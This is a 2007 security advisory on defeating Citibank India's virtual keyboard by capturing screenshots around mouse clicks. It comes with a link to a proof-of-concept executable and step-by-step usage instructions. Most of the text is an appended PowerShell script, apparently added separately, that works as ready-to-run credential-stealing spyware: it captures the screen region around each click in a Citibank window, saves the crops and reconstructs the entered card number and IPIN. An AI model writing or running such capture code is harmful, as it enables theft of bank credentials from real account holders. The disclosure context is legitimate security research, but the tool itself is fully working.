
Citibank.co.in Virtual Keyboard Key Capture


Posted: May 7th, 2007 @ 5:40am


Defeating Citibank Virtual Keyboard protection using screenshot method

By Yash K.S <yashks@gmail.com>

http://www.tracingbug.com

 

Disclaimer:

 

The author takes no responsibility for any actions taken with the information or code provided here. Copyright in all material created by the author is reserved. Duplication of the code or text provided here in electronic or printed publications is not permitted without the author's agreement.

 

 

Original URL: http://www.tracingbug.com/index.php/articles/view/23.html

 

 

Description:

 

The Citibank Virtual Keyboard is a security enhancement intended to protect against keyloggers. With it, the user enters the card number and IPIN by clicking on-screen keys with the mouse instead of typing them. The keyboard lays its keys out in random positions on the screen, which makes capturing the password somewhat harder. This only protects the end user from keyloggers, not from other methods: a local attacker can use Win32 APIs to take a screenshot around each mouse click and so obtain the sensitive data being entered, including the credit card/debit card (Suvidha account) number and IPIN, and misuse it.

 

Note:

My intention is to help people try out the POC and understand it themselves (of course, if you can code one yourself, please do).

 

Platforms Affected:

 

  • Microsoft Corporation: Windows 98 Any version
  • Microsoft Corporation: Windows Me Any version
  • Microsoft Corporation: Windows XP Any version
  • Microsoft Corporation: Windows 2000 Any version
  • Microsoft Corporation: Windows 2003 Any version
  • Microsoft Corporation: Windows NT 4.0 Any version
  • Citi-Bank: Citi-Bank Virtual Keyboard Any version

 

Browsers:

  • Microsoft Internet Explorer Any version
  • Mozilla FireFox Any version
  • Any browser running on the Win32 platform (with slight modification)

References:

CitiBank Web site - http://www.citibank.com/us

 

Step by Step Demo (anyone who would like to check the POC can do so; it does not contain any malware):

 

§         Download the POC from http://tracingbug.com/downloads/citihook.zip and unzip it to a directory

§         Launch citihook.exe; it watches only the URL https://www.online.citibank.co.in/

§         Visit https://www.online.citibank.co.in/

§         In the "Login to Citibank online" box on the right side of the screen, click the "Go" button

§         You will land on the following screen for entering the card number and IPIN


§         Every click on the above screen is captured by the citihook module. All the screenshots are placed in the directory c:\citilogon; read the bitmaps one by one to reconstruct the password manually. To determine the order of the keys, check the filenames. In the following screenshot you can see that the user has entered "YASHKS".


§         A local attacker can then send these files to a remote location for further misuse; this is easy since the files are small. Many optimisations of this method are possible.
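The capture-and-reconstruct procedure above, written out as an added PowerShell example; this is not the article's citihook.exe and makes a few assumptions of its own: it polls GetAsyncKeyState for the left mouse button instead of installing a mouse hook, it filters on a window title containing "Citibank" (an assumed filter; the original PoC filters on the URL), it writes to the same c:\citilogon directory, and it adds a -Reconstruct mode that tiles the saved crops in filename order into one image so the whole entry can be read at a glance. The parameter names, file-name layout and the sequence.png output are this example's own choices.

```powershell
# Added example, not the article's citihook.exe: click-triggered screen capture
# and strip reconstruction for Windows PowerShell 5.1 / PowerShell 7 on Windows.
#   .\ClickCapture.ps1                 # watch clicks, write crops to C:\citilogon
#   .\ClickCapture.ps1 -Reconstruct    # tile the crops in filename order into one image
# Assumptions: the script runs in the same desktop session as the victim, the target
# browser's window title contains "Citibank" (assumed filter), and the process is
# DPI-aware enough that cursor coordinates and screen pixels agree.
param(
    [switch]$Reconstruct,
    [string]$OutDir     = 'C:\citilogon',   # directory the article's PoC also uses
    [int]$Radius        = 40,               # pixels captured on each side of the click
    [string]$TitleMatch = 'Citibank'        # assumed window-title filter
)

Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName System.Windows.Forms
# user32 calls, declared with their documented signatures.
Add-Type @"
using System;
using System.Runtime.InteropServices;
using System.Text;
public static class ClickWatch {
    [DllImport("user32.dll")] public static extern short GetAsyncKeyState(int vKey);
    [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow();
    [DllImport("user32.dll", CharSet = CharSet.Unicode)]
    public static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
}
"@

function Get-ForegroundTitle {
    $sb = New-Object System.Text.StringBuilder 512
    [void][ClickWatch]::GetWindowText([ClickWatch]::GetForegroundWindow(), $sb, $sb.Capacity)
    return $sb.ToString()
}

# Save a crop of (2*Radius) square pixels around the click. The zero-padded sequence
# number leads the filename, so 'dir' or Sort-Object Name gives the order of the keys.
function Save-ClickCapture {
    param([int]$X, [int]$Y, [int]$Seq)
    $scr  = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $left = [Math]::Max($scr.Left, $X - $Radius)
    $top  = [Math]::Max($scr.Top,  $Y - $Radius)
    $w    = [Math]::Min($scr.Right  - $left, 2 * $Radius)
    $h    = [Math]::Min($scr.Bottom - $top,  2 * $Radius)
    $bmp  = New-Object System.Drawing.Bitmap ([int]$w), ([int]$h)
    $g    = [System.Drawing.Graphics]::FromImage($bmp)
    $g.CopyFromScreen($left, $top, 0, 0, $bmp.Size)   # GDI BitBlt from the screen DC
    $g.Dispose()
    $name = '{0:D4}_{1}_{2}x{3}.bmp' -f $Seq, (Get-Date -Format 'yyyyMMdd-HHmmss-fff'), $X, $Y
    $bmp.Save((Join-Path $OutDir $name), [System.Drawing.Imaging.ImageFormat]::Bmp)
    $bmp.Dispose()
    return $name
}

# Tile every crop left to right in filename (= click) order so the whole entry can be
# read from one image instead of opening the bitmaps one by one.
function Join-ClickCaptures {
    param([string]$Dir, [string]$Out)
    $files = Get-ChildItem -Path $Dir -Filter '*.bmp' | Sort-Object Name
    if (-not $files) { return $null }
    $tiles = @($files | ForEach-Object { New-Object System.Drawing.Bitmap $_.FullName })
    $w = [int](($tiles | Measure-Object -Property Width  -Sum).Sum)
    $h = [int](($tiles | Measure-Object -Property Height -Maximum).Maximum)
    $strip = New-Object System.Drawing.Bitmap $w, $h
    $g = [System.Drawing.Graphics]::FromImage($strip)
    $x = 0
    foreach ($t in $tiles) { $g.DrawImage($t, $x, 0); $x += $t.Width; $t.Dispose() }
    $g.Dispose()
    $strip.Save($Out, [System.Drawing.Imaging.ImageFormat]::Png)
    $strip.Dispose()
    return $Out
}

if ($Reconstruct) {
    Join-ClickCaptures -Dir $OutDir -Out (Join-Path $OutDir 'sequence.png')
    return
}

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
$VK_LBUTTON = 0x01
$seq = 0; $wasDown = $false
Write-Host "Capturing clicks while a '$TitleMatch' window is in the foreground; Ctrl+C to stop."
while ($true) {
    # High bit of GetAsyncKeyState = button currently down; act only on the down edge.
    $down = ([ClickWatch]::GetAsyncKeyState($VK_LBUTTON) -band 0x8000) -ne 0
    if ($down -and -not $wasDown -and (Get-ForegroundTitle) -match $TitleMatch) {
        $p = [System.Windows.Forms.Cursor]::Position
        $seq++
        Save-ClickCapture -X $p.X -Y $p.Y -Seq $seq | Out-Null
    }
    $wasDown = $down
    Start-Sleep -Milliseconds 10
}
```

Two practical notes. Nothing here needs administrative rights: GetAsyncKeyState, GetForegroundWindow and a screen-DC BitBlt are all available to an ordinary user in the same interactive session, which is exactly why a randomised on-screen keyboard does not help against a local attacker. And because the crop is taken a few milliseconds after the click, a virtual keyboard that hides or re-shuffles its keys on mouse-down can leave the crop showing the new layout rather than the key that was pressed; capturing on the down edge, as above, narrows that window but does not close it.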


Copyright © 2005-2008 Yashks.com. All Rights Reserved
